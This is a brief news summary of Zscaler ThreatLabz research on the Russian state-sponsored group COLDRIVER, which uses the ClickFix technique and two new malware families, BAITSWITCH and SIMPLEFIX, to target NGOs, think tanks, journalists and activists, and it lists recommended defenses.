"The Russian cyber espionage group COLDRIVER is adding the ClickFix attack method to its arsenal. The Zscaler ThreatLabz team discovered two new malware families, BAITSWITCH and SIMPLEFIX, which the group uses to selectively spread malware. This development shows that advanced threat actors continue to adapt to new techniques to reach their targets. COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057, is known for targeting NGOs, think tanks, journalists, and human rights activists."
"The attack chain uses two new lightweight malware families. BAITSWITCH acts as a downloader, while SIMPLEFIX works as a PowerShell backdoor. The group uses server-side controls to determine who receives the malicious code based on user agent and machine characteristics. Based on the research, Zscaler can confidently determine that this campaign was executed by COLDRIVER, a Russian state-sponsored threat group."
COLDRIVER deployed ClickFix alongside two lightweight malware families: BAITSWITCH, a downloader, and SIMPLEFIX, a PowerShell backdoor. The actor uses server-side controls to selectively deliver malicious code based on user agent and machine characteristics, increasing targeting precision and reducing detection. Targets include individuals with strong connections in NGOs, think tanks, journalism, and human rights communities to enable deeper network intrusion via follow-on phishing. The operation aligns with Russian state-sponsored strategic targeting patterns. Recommended defenses include independent verification of contacts, phishing-resistant MFA (FIDO2/WebAuthn), enforcing least privilege, and application control tools such as Windows AppLocker.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]